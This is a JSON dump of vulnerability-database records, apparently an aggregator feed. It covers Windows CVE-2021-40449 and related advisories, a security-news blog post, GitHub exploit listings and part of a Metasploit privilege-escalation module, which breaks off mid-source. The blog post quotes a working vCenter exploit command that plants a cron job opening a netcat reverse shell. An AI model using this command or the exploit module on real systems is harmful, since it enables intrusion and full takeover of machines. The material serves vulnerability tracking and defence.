"baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40467"], "modified": "2021-10-12T00:00:00", "id": "CPAI-2021-0736", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:31:50", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Common Log File System Driver Elevation of Privilege (CVE-2021-40466)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40466"], "modified": "2021-10-12T00:00:00", "id": "CPAI-2021-0735", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:31:53", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2021-40449)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449"], "modified": "2021-10-12T00:00:00", "id": "CPAI-2021-0739", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2022-01-31T22:17:07", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the storport.sys driver. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before writing to memory. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-14T00:00:00", "type": "zdi", "title": "Microsoft Windows storport Integer Overflow Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40489"], "modified": "2021-10-14T00:00:00", "id": "ZDI-21-1156", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-1156/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-11-26T18:43:30", "description": "Hello everyone! This episode will be about relatively recent critical vulnerabilities. Let&#x27;s start with Microsoft Patch Tuesday for October 2021. Specifically, with the vulnerability that I expected there, but it didn&#x27;t get there.\n\n## Autodiscover leak discovered by Guardicore Labs \n\n&quot;Autodiscover, a protocol used by Microsoft Exchange for automatic configuration of clients such as Microsoft Outlook, has a design flaw that causes the protocol to \u201cleak\u201d web requests to Autodiscover domains outside of the user\u2019s domain but in the same TLD (i.e. Autodiscover.com).&quot; [Guardicore Labs acquired multiple Autodiscover domains](<https://www.guardicore.com/labs/autodiscovering-the-great-leak/>) and have captured 372,072 Windows domain credentials in total. It seems Microsoft have chosen to ignore this issue. No CVE, no Outlook or ActiveSync patches. The only fix is to ban the &quot;Autodiscover.&quot; domains on devices.\n\n## Microsoft Patch Tuesday for October 2021\n\n74 vulnerabilities: 1 Critical, 30 High, 43 Medium.\n\n### Elevation of Privilege - Windows Kernel (CVE-2021-40449)\n\nIt is a [use-after-free vulnerability](<https://encyclopedia.kaspersky.com/glossary/use-after-free/>) in the NtGdiResetDC function of the Win32k driver. A detailed technical description is available in Kasperky [Securelist post](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>), but, in short, the vulnerability can lead to leakage of kernel module addresses in the computer\u2019s memory. This vulnerability is being exploited in the wild by APT MysterySnail. All servers and desktops should be updated.\n\n### Remote Code Execution - Microsoft Exchange Server (CVE-2021-26427)\n\nIt is necessary to update the Exchanges, but it&#x27;s not very critical. &quot;Despite the high CVSS score, the advisory does specifically point out that the vulnerability would only be exploitable from an adjacent network&quot;. There are no signs of exploitation or exploits yet. Three other vulnerabilities related to Exchange Server were also patched: CVE-2021-41350, a Spoofing vulnerability; CVE-2021-41348, allowing elevation of privilege; and CVE-2021-34453, which is a Denial of Service vulnerability.\n\n### Remote Code Execution - Windows DNS Server (CVE-2021-40469)\n\nDNS servers need to be updated, but real exploitation is unlikely. It was categorized as \u201cExploitation Less Likely.\u201d It received a CVSSv3 score of 7.2 because an attacker needs a privileged user account in order to exploit this across the network.\n\n### Remote Code Execution - Microsoft Word (CVE-2021-40486)\n\nThis is a good reason to check the Windows desktop updates. &quot;This patch corrects a bug that would allow code execution when a specially crafted Word document is viewed on an affected system. Although Microsoft lists user interaction required, the Preview Pane is also listed as an attack vector.&quot; Also take a look at desktop vulnerability Spoofing - Windows Print Spooler (CVE-2021-36970), \u201cExploitation More Likely\u201d.\n\nAnd here you can get the whole [Vulristics report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_october2021_report_avleonov_comments.html>) for Microsoft Patch Tuesday October 2021.\n\n## Apache RCE with exploit (CVE-2021-41773)\n\nApache situation is like The Benny Hill Show. First, they released a new version (49) with a critical Path Traversal / RCE vulnerability CVE-2021-41773. Other versions were safe. Fortunately, this was revealed relatively quickly, in 2 weeks. The main stable distributions simply did not have time to add these packages to their repositories. Only fans of installing Apache from source and users of Slackware, Fedora and FreeBSD have suffered. And what was left for the victims to do? Obviously, hurry to roll the new safe version (50). But it turned out that the vulnerability in 50 was not completely fixed. And now the exploit [Apache HTTP Server 2.4.50 - Path / Traversal &amp; Remote Code Execution (RCE)](<https://vulners.com/exploitdb/EDB-ID:50406>) is [publicly available](<https://t.me/avleonovnews/7619>). Repeat the exercise comrades in rolling now version 51. Everything will definitely be fine there.  It&#x27;s just a circus. \n\n## HAProxy RCE with exploit (CVE-2021-40346)\n\nA critical security vulnerability has [been disclosed in HAProxy](<https://thehackernews.com/2021/09/haproxy-found-vulnerable-to-critical.html>), a widely used open-source load balancer and proxy server, that could be abused by an adversary to possibly smuggle HTTP requests, resulting in unauthorized access to sensitive data and execution of arbitrary commands, effectively opening the door to an array of attacks. [A public POC](<https://github.com/donky16/CVE-2021-40346-POC>) has appeared for the vulnerability.\n\n## VMware vCenter arbitrary file upload with public exploit\n\n&quot;[On September 21, 2021, VMware disclosed](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>) that its vCenter Server is affected by an arbitrary file upload vulnerability\u2014CVE-2021-22005\u2014in the Analytics service. A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server. On September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability&quot;.\n\n> CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below. \n \ncurl -kv &quot;https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&amp;_i=/../../../../../../etc/cron.d/$RANDOM&quot; -H Content-Type: -d &quot;* * * * * root nc -e /bin/sh 172.16.57.1 4444&quot; <https://t.co/wi08brjl3r> [pic.twitter.com/bwjMA21ifA](<https://t.co/bwjMA21ifA>)\n> \n> -- wvu (@wvuuuuuuuuuuuuu) [September 27, 2021](<https://twitter.com/wvuuuuuuuuuuuuu/status/1442634215330390020?ref_src=twsrc%5Etfw>)\n\n## RCE exploits for Moodle\n\nSeveral RCE exploits for Moodle [were released on October 13](<https://t.me/avleonovnews/7605>). \n\n 1. [1337DAY-ID-36891](<https://vulners.com/zdt/1337DAY-ID-36891>) - Moodle Admin Shell Upload Exploit\n 2. [1337DAY-ID-36892](<https://vulners.com/zdt/1337DAY-ID-36892>) - Moodle SpellChecker Path Authenticated Remote Command Execution Exploit\n 3. [1337DAY-ID-36893](<https://vulners.com/zdt/1337DAY-ID-36893>) - Moodle Teacher Enrollment Privilege Escalation / Remote Code Execution Exploit\n 4. [1337DAY-ID-36894](<https://vulners.com/zdt/1337DAY-ID-36894>) - Moodle Authenticated Spelling Binary Remote Code Execution Exploit\n\n&quot;Moodle is a free and open-source learning management system. it is used for blended learning, distance education, flipped classroom and other e-learning projects in schools, universities, workplaces and other sectors&quot;. Surely some organizations make it available on the network perimeter and do not update it regularly.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-21T00:23:01", "type": "avleonov", "title": "Security News: Microsoft Patch Tuesday October 2021, Autodiscover, MysterySnail, Exchange, DNS, Apache, HAProxy, VMware vCenter, Moodle", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005", "CVE-2021-26427", "CVE-2021-34453", "CVE-2021-36970", "CVE-2021-40346", "CVE-2021-40449", "CVE-2021-40469", "CVE-2021-40486", "CVE-2021-41348", "CVE-2021-41350", "CVE-2021-41773"], "modified": "2021-10-21T00:23:01", "id": "AVLEONOV:99215B2D7808C46D8762AD712CD3D267", "href": "https://avleonov.com/2021/10/21/security-news-microsoft-patch-tuesday-october-2021-autodiscover-mysterysnail-exchange-dns-apache-haproxy-vmware-vcenter-moodle/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-08-06T23:52:04", "description": "# voidmap\nA very simple driver manual mapper that exploits CVE-2...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-04T17:55:52", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449"], "modified": "2022-08-05T18:32:10", "id": "76666F17-9DF5-5F98-947E-FFDF631368B5", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-27T13:13:40", "description": "# CVE-2021-40449\nMore info here: [https://kristal-g.github.io/20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-07T16:15:19", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449"], "modified": "2022-07-27T07:13:12", "id": "67AC7DCE-FB2F-5A78-AB0A-F4A37D19901F", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:56:00", "description": "# CVE-2021-40449-Exploit\n\nolny worker on w...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-20T09:24:36", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449"], "modified": "2022-06-10T10:41:25", "id": "B45F7278-2C20-5C06-B834-59D960047852", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-27T08:50:57", "description": "# CVE-2021-40449\nMy exploit for CVE-2021-40449, a Windows LPE vi...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T04:58:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449"], "modified": "2022-07-27T07:13:11", "id": "059CF457-59E4-5647-A0BC-0014C543D6D3", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-05T14:30:59", "description": "# CVE-2021-40449-NtGdiResetDC-UAF\n\nA POC for CVE-2021-40449.\nOnl...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-20T16:23:26", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449"], "modified": "2022-03-05T12:07:34", "id": "07E9B4B7-D316-5CFB-BB6E-CAB4F7217BD4", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-04T11:41:54", "description": "# CallbackHell\n\nExploit for CVE-2021-40449 (Win32k - LPE)\n\n- [Ca...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-16T16:17:44", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3309", "CVE-2021-40449"], "modified": "2022-04-04T10:25:24", "id": "94F9D54F-CE33-561C-A65A-3C28F00AF2AD", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "metasploit": [{"lastseen": "2022-06-24T08:36:46", "description": "A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by an attacker to escalate privileges to those of `NT AUTHORITY\\SYSTEM`. The flaw exists due to the fact that this function calls `hdcOpenDCW()`, which performs a user mode callback. During this callback, attackers can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\\SYSTEM. This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions of Windows 10 will likely also work.\n", "cvss3": {}, "published": "2021-11-09T16:36:40", "type": "metasploit", "title": "Win32k NtGdiResetDC Use After Free Local Privilege Elevation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-40449"], "modified": "2021-11-09T16:36:50", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2021_40449-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2021_40449/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'Win32k NtGdiResetDC Use After Free Local Privilege Elevation',\n 'Description' => %q{\n A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by\n an attacker to escalate privileges to those of `NT AUTHORITY\\SYSTEM`. The flaw exists due to the fact\n that this function calls `hdcOpenDCW()`, which performs a user mode callback. During this callback, attackers\n can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object\n that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle\n with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the\n attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the\n kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\\SYSTEM.\n\n This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions\n of Windows 10 will likely also work.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'IronHusky', # APT Group who exploited this in the wild\n 'Costin Raiu', # Initial reporting on bug at SecureList\n 'Boris Larin', # Initial reporting on bug at SecureList\n \"Red Raindrop Team of Qi'anxin Threat Intelligence Center\", # detailed analysis report in Chinese showing how to replicate the vulnerability\n 'KaLendsi', # First Public POC targeting Windows 10 build 14393 only, later added support for 17763\n 'ly4k', # GitHub POC adding support for Windows 10 build 17763, PoC used for this module.\n 'Grant Willcox' # metasploit module\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [ 'Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'References' => [\n [ 'CVE', '2021-40449' ],\n [ 'URL', 'https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/' ], # Initial report of in the wild exploitation\n [ 'URL', 'https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ' ], # Detailed writeup\n [ 'URL', 'https://github.com/KaLendsi/CVE-2021-40449-Exploit' ], # First public PoC\n [ 'URL', 'https://github.com/ly4k/CallbackHell' ] # Updated PoC this module uses for exploitation.\n ],\n 'DisclosureDate' => '2021-10-12',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 'SideEffects' => []\n }\n }\n )\n )\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n build_num_raw = cmd_exec('cmd.exe /c ver')\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)\n if build_num.nil?\n print_error(\"Couldn't retrieve the target's build number!\")\n else\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0]\n print_status(\"Target's build number: #{build_num}\")\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|2008|2012|2016|2019|1803|1809|1903)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n build_num_gemversion = Rex::Version.new(build_num)\n\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2021-10-12/microsoft/\n if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) && (build_num_gemversion < Rex::Version.new('10.0.22000.258')) # Windows 11\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) && (build_num_gemversion < Rex::Version.new('10.0.20348.288')) # Windows Server 2022\n return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) && (build_num_gemversion < Rex::Version.new('10.0.19044.1319')) # Windows 10 21H2\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) && (build_num_gemversion < Rex::Version.new('10.0.19043.1288')) # Windows 10 21H1\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.1288')) # Windows 10 20H2\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.1288')) # Windows 10 20H1\n return CheckCode::Appears('Vulnerable Windows 10 20H1 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1854')) # Windows 10 v1909\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.9999999')) # Windows 10 v1903\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.2237')) # Windows 10 v1809\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.999999')) # Windows 10 v1803\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) && (build_num_gemversion < Rex::Version.new('10.0.16299.999999')) # Windows 10 v1709\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) && (build_num_gemversion < Rex::Version.new('10.0.15063.999999')) # Windows 10 v1703\n return 